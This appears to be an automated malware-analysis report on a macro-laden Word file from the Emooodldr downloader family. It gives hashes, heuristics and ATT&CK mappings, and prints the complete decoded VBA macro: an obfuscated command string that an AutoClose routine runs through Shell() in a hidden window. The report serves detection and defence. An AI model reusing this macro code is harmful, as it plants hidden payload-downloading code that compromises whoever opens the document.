Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 90d3cad13e03fa3a…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 33.3 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-01-20
MD5: 94d2add64b1e07760e8e4d19f5990a6d
SHA-1: 2304d54247853d33128b1606929b55c2e178b947
SHA-256: 90d3cad13e03fa3a586c84deacd68bf6ae37f60ea030d1efaea5fbacc1a1e93f
Risk Score: 244

Malware Insights

Family: Emooodldr (confidence 95%)

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. It contains VBA macros, including an Auto_Close macro (run automatically when the document is closed) that decodes an obfuscated string and passes it to the Shell() function with window style 0, i.e. a hidden window. This indicates the macro is designed to download and execute a second-stage payload.

Heuristics (6)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML [medium, OOXML_VBA, 2 related findings]
    Document contains a VBA project (VBA macros present)
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    The VBA code calls the Shell() function
  • Auto_Close macro [high, OLE_VBA_AUTOCLOSE]
    An Auto_Close macro is present; it runs without user interaction when the document is closed
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    All six URLs are standard OOXML XML namespace identifiers found in the markup of any Word document; they are not network indicators.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2448 bytes
SHA-256: eb82d4b961eecc8e24d860ede2c04a0f54dbfc6f2d7bde16c81c2506541c7120
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob)
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function strutto(balzano As Integer) As String
 Dim tubatura() As Variant
 tubatura = Array("l", "g", "+", ")", "8", "X", "a", "t", "P", "x", "/", "s", "D", "j", "1", "m", "p", "?", "B", "'", ";", "O", "b", "e", "2", "o", "W", "N", "r", ",", "-", "$", "v", "3", "i", "f", "y", "I", "n", "T", "\", ":", ".", "E", "V", "u", "w", "(", "c", "h", "C", "d", "A", "=", "4", "S", "F", " ")
 Dim rasatura As Integer
 
 For rasatura = LBound(tubatura) To UBound(tubatura)
   If rasatura = balzano Then
    strutto = tubatura(rasatura)
   End If
 Next
 
End Function

Function astice(ancora As String)
    ancora = StrConv(ancora, vbUnicode)
    astice = Split(Left(ancora, Len(ancora) - 1), vbNullChar)
End Function

Function castello(roco As String) As String
  Dim inter As Integer
  Dim fucilata As String
  Dim salivare As Variant
  salivare = astice(Trim(roco))
  For rasatura = 0 To Len(roco)
  
    If (rasatura + 1) <= UBound(salivare) Then
    Dim acetone As String
    acetone = salivare(rasatura)
    rasatura = rasatura + 1
    acetone = acetone + salivare(rasatura)
    
    fucilata = fucilata + strutto(Int(acetone))
    End If
  Next
  
  castello = fucilata
End Function

Public Function treccia(flamenco As String)
  Shell flamenco, 0
End Function

Sub AutoClose()
 Call Application.Run("treccia", castello("48155142230923571048571625462328114923000057304309234857183616061111573027250857305025151506385157472723463021221323480757553611072315422723074226232250003423380703421225463800250651563400234719490707164110100606385123230138062306383642482515103834382510114516232842155135192957312338324152080812523952570257194013085056442609422309231903205755070628073008282548231111573123383241520808125239521940130850564426094223092319205747272346302122132348075755361107231542272307422623225000342338070342122546380025065155072834380147194907071641101006063851232301380623063836424825151011421649161734515311451623281903205737430547472723463021221323480757553611072315422723074226232250003423380703421225463800250651550728343801471949070716411010331442140454422433544214540410114216491619030320"))
End Sub

Artifact 2: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 11776 bytes
SHA-256: 696cf8412110b283dddc04b8346a17510e80e09ae5b2bcd5c0e1ef6480d88576
Detection: ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob)